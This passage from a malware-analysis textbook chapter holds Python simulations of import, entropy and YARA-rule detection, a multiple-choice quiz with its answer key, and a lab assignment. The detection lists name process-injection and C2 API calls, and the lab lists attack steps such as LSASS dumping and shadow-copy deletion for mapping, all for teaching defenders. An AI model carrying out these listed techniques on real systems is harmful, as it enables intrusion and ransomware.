Answers: (1) A worm self-propagates across networks with no user action; a virus needs a host file to be opened, and a Trojan needs the user to run disguised software. (2) Exfiltration enables double extortion (threatening to leak data even if files are restored), and disabling backups removes the victim’s ability to recover without paying. (3) It runs in memory and abuses legitimate built-in tools, leaving few on-disk signatures; memory forensics (Chapter 13) and behavior-based detection/EDR (Chapter 12) help.

News in Focus: Fileless and Living-off-the-Land Attacks#

The discovery of sophisticated ransomware variants using legitimate management tools (PsExec, WMI, RDP) rather than traditional malware executables challenged organizations that relied on antivirus detection. These campaigns were classified as fileless or living-off-the-land because the malicious activity was performed by binaries already present on every Windows system. Detection required behavioral analysis rather than signature matching, driving the market shift from antivirus to endpoint detection and response (EDR).

# Chapter 15 -- Static analysis simulation: PE imports, strings, entropy, YARA

import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c/total)*math.log2(c/total) for c in counts.values())

# Simulated PE import analysis
suspicious_imports = {
    "CreateRemoteThread":   "Process injection (T1055)",
    "VirtualAllocEx":       "Allocate memory in remote process",
    "WriteProcessMemory":   "Write to remote process memory",
    "RegSetValueEx":        "Registry persistence (T1547)",
    "WinExec":              "Execute commands",
    "CryptEncrypt":         "Encryption -- possible ransomware",
    "FindFirstFile":        "File enumeration -- possible ransomware",
    "InternetOpenUrl":      "Network C2 communication",
    "IsDebuggerPresent":    "Anti-debugging check (T1622)",
}

benign_imports = ["GetLastError", "HeapAlloc", "CreateFile", "CloseHandle",
                  "GetModuleHandleA", "LoadLibraryA", "GetProcAddress"]

print("=== Simulated PE Import Analysis ===")
sample_imports = list(suspicious_imports.keys())[:6] + benign_imports[:4]

print(f"\n  Total imports found: {len(sample_imports)}")
print(f"  {'Import':<28} {'Suspicion'}")
print("  " + "-"*70)
for imp in sample_imports:
    note = suspicious_imports.get(imp, "Benign")
    flag = " <-- SUSPICIOUS" if imp in suspicious_imports else ""
    print(f"  {imp:<28} {note}{flag}")

# Entropy analysis on synthetic byte strings that stand in for PE sections
import random
random.seed(42)
packed_data   = bytes([random.randint(0,255) for _ in range(4096)])  # high entropy
unpacked_data = (b"This is a normal text string with low entropy. " * 100)[:4096]
code_section  = bytes([random.randint(0,127) for _ in range(4096)])  # medium entropy

print("\n=== Entropy Analysis ===")
print(f"  Packed/encrypted section : {shannon_entropy(packed_data):.2f} bits/byte  (>7.5 = packed)")
print(f"  Code section             : {shannon_entropy(code_section):.2f} bits/byte  (typical)")
print(f"  Data/strings section     : {shannon_entropy(unpacked_data):.2f} bits/byte  (normal)")

# YARA-like rule simulation
print("\n=== YARA Rule Match Simulation ===")

class YaraRule:
    def __init__(self, name, strings, condition_count):
        self.name = name
        self.strings = strings
        self.condition_count = condition_count

    def match(self, content: str) -> bool:
        # Case-insensitive substring test; the rule fires on at least condition_count hits.
        matched = sum(1 for s in self.strings if s.lower() in content.lower())
        return matched >= self.condition_count

rules = [
    YaraRule("RansomwareStrings",
             ["your files have been encrypted", ".onion", "bitcoin", "decryption key"],
             condition_count=2),
    YaraRule("RemoteAccessTrojan",
             ["CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory"],
             condition_count=2),
    YaraRule("AntiAnalysis",
             ["IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"],
             condition_count=1),
]

samples = {
    "sample_a.exe": "CreateRemoteThread VirtualAllocEx WriteProcessMemory IsDebuggerPresent",
    "sample_b.exe": "Your files have been encrypted. Send bitcoin to .onion address for decryption key.",
    "sample_c.exe": "GetLastError HeapAlloc CreateFile CloseHandle",
}

for fname, content in samples.items():
    hits = [r.name for r in rules if r.match(content)]
    result = ", ".join(hits) if hits else "No match"
    print(f"  {fname}: {result}")

=== Simulated PE Import Analysis ===

  Total imports found: 10
  Import                       Suspicion
  ----------------------------------------------------------------------
  CreateRemoteThread           Process injection (T1055) <-- SUSPICIOUS
  VirtualAllocEx               Allocate memory in remote process <-- SUSPICIOUS
  WriteProcessMemory           Write to remote process memory <-- SUSPICIOUS
  RegSetValueEx                Registry persistence (T1547) <-- SUSPICIOUS
  WinExec                      Execute commands <-- SUSPICIOUS
  CryptEncrypt                 Encryption -- possible ransomware <-- SUSPICIOUS
  GetLastError                 Benign
  HeapAlloc                    Benign
  CreateFile                   Benign
  CloseHandle                  Benign

=== Entropy Analysis ===
  Packed/encrypted section : 7.96 bits/byte  (>7.5 = packed)
  Code section             : 6.98 bits/byte  (typical)
  Data/strings section     : 3.91 bits/byte  (normal)

=== YARA Rule Match Simulation ===
  sample_a.exe: RemoteAccessTrojan, AntiAnalysis
  sample_b.exe: RansomwareStrings
  sample_c.exe: No match
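
The simulated rules map fairly directly onto real YARA syntax. As a rough sketch, the helper below renders a rule name, a string list, and a match threshold as YARA rule text. The function `render_yara` is a hypothetical name introduced here for illustration; it is not part of the chapter's code or of YARA itself. It uses the `nocase` modifier to mirror the simulator's case-insensitive matching and an `N of them` condition for the threshold.

```python
def render_yara(name, strings, condition_count):
    """Render a simulator-style rule as YARA source text (illustrative helper)."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        # Escape backslashes and double quotes so the string literal stays valid
        escaped = s.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{escaped}" nocase')
    # "N of them" is satisfied when at least N of the declared strings match
    lines += ["    condition:", f"        {condition_count} of them", "}"]
    return "\n".join(lines)

rule_text = render_yara(
    "RansomwareStrings",
    ["your files have been encrypted", ".onion", "bitcoin", "decryption key"],
    2,
)
print(rule_text)
```

Saved to a file such as `rules.yar` (an assumed filename), the generated text could then be run against a sample with the `yara` command-line tool, which takes a rules file followed by a target path.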

Review Questions (MCQ)#

Q1. A worm differs from a virus primarily in that a worm: A. Is harder to detect B. Does not require a host file and propagates autonomously C. Only targets Windows D. Always encrypts files

Q2. Double extortion ransomware combines encryption with: A. Phishing B. Exfiltration of data as a second source of leverage C. DDoS D. Rootkit installation

Q3. High entropy (close to 8 bits/byte) in a PE section suggests: A. A legitimate executable B. The section is encrypted or packed C. The file is a PDF D. The file has no imports

Q4. The combination of Windows API functions most indicative of process injection is: A. RegSetValueEx + CreateFile B. VirtualAllocEx + CreateRemoteThread + WriteProcessMemory C. CryptEncrypt + FindFirstFile D. WinExec + GetProcAddress

Q5. YARA rules are used to: A. Decrypt malware B. Match file patterns to classify malware families C. Block network traffic D. Analyze network captures

Q6. A rootkit at the kernel level is best detected by: A. Running antivirus from within the compromised OS B. Inspection from a known-good external context (live boot, memory forensics) C. Checking the registry for Run keys D. Examining browser history

Q7. Domain Generation Algorithms (DGA) in C2 make blocking difficult because: A. They use HTTPS B. They generate thousands of potential C2 domains, making blocklists impractical C. They encrypt DNS traffic D. They run on port 443

Q8. Fileless malware evades detection by: A. Using encrypted executables B. Executing only in memory via legitimate system binaries (LOLBins) C. Disabling antivirus on startup D. Using rootkit techniques

Q9. INetSim in a malware analysis lab is used to: A. Capture network traffic B. Simulate internet services so malware can behave normally without reaching the real internet C. Unpack malware D. Write YARA rules

Q10. The ransomware attack chain step that immediately precedes encryption is: A. Initial access B. Privilege escalation C. Disabling backups and shadow copies D. Exfiltration

Answers: Q1 B, Q2 B, Q3 B, Q4 B, Q5 B, Q6 B, Q7 B, Q8 B, Q9 B, Q10 C.

Lab Assignment#

Part A – Static analysis: Download a benign PE file (e.g., a portable app from a trusted source). Use strings (Linux) or CFF Explorer (Windows) to extract its strings, then identify any URLs, registry keys, or suspicious API imports. Compute the file's SHA-256 hash and look it up on VirusTotal.

Part B – Sandbox submission: Submit a known benign file (or a deliberately harmless script you write) to ANY.RUN or Hybrid Analysis. Document the behavioral report: file activity, registry activity, network connections, and any detection verdicts. Explain what each reported behavior means.

Part C – YARA rule writing: Write three YARA rules: one for a hypothetical ransomware sample (based on the string patterns in the chapter), one for a RAT (based on import combinations), and one for an anti-debugging sample. Test each rule using the simulator above with sample strings you compose.

Part D – MITRE ATT&CK mapping: For a ransomware incident with the following behaviors (spear phishing initial access, PowerShell execution, LSASS dump, lateral movement via PsExec, Shadow Copy deletion, file encryption), map each behavior to its ATT&CK technique ID and tactic.
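
The hashing and string-extraction steps in Part A can also be scripted. The sketch below is one possible approach using only the Python standard library. The helper names `sha256_of_file` and `extract_strings`, the 4-character minimum length, and the demo bytes are illustrative assumptions, not tools or values prescribed by the chapter.

```python
import hashlib
import re

def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large samples need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def extract_strings(data, min_len=4):
    """Return runs of printable ASCII that are at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

# Demo bytes standing in for file contents (hypothetical, not a real sample)
demo = b"\x00\x01http://example.com/payload\x00\xffab\x00RegSetValueExA\x00"
found = extract_strings(demo)
print(found)  # ['http://example.com/payload', 'RegSetValueExA']
```

For a real file, `extract_strings(open(path, "rb").read())` gives a rough equivalent of the `strings` utility for ASCII text. It does not find UTF-16 strings, which are common in Windows binaries, so a dedicated tool remains the better choice for thorough work.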

References#

NIST Computer Security Resource Center (CSRC) glossary: definition of malware.
Practical Computer Security (Course 3): lecture on Antivirus and Antimalware (history, detection generations, identification behaviors).
Email authentication standards SPF, DKIM, and DMARC; rootkit-detection tools (GMER, chkrootkit, rkhunter).
Microsoft Security Bulletin MS17-010; CVE-2017-0144 (EternalBlue / SMBv1). Reporting on the WannaCry outbreak (May 2017).
Sikorski, M., and Honig, A. Practical Malware Analysis. No Starch Press.
No More Ransom project (Europol European Cybercrime Centre, Dutch National Police, and partners). Crypto Sheriff and free decryption tools. https://www.nomoreransom.org
Check Point Research (2023). Rorschach: A New Sophisticated and Fast Ransomware.
UK National Crime Agency (2024). Operation Cronos: disruption of the LockBit ransomware group.
Reverse-engineering tools: Ghidra (NSA), IDA Pro (Hex-Rays), Binary Ninja, JADX, and Cutter (rizin).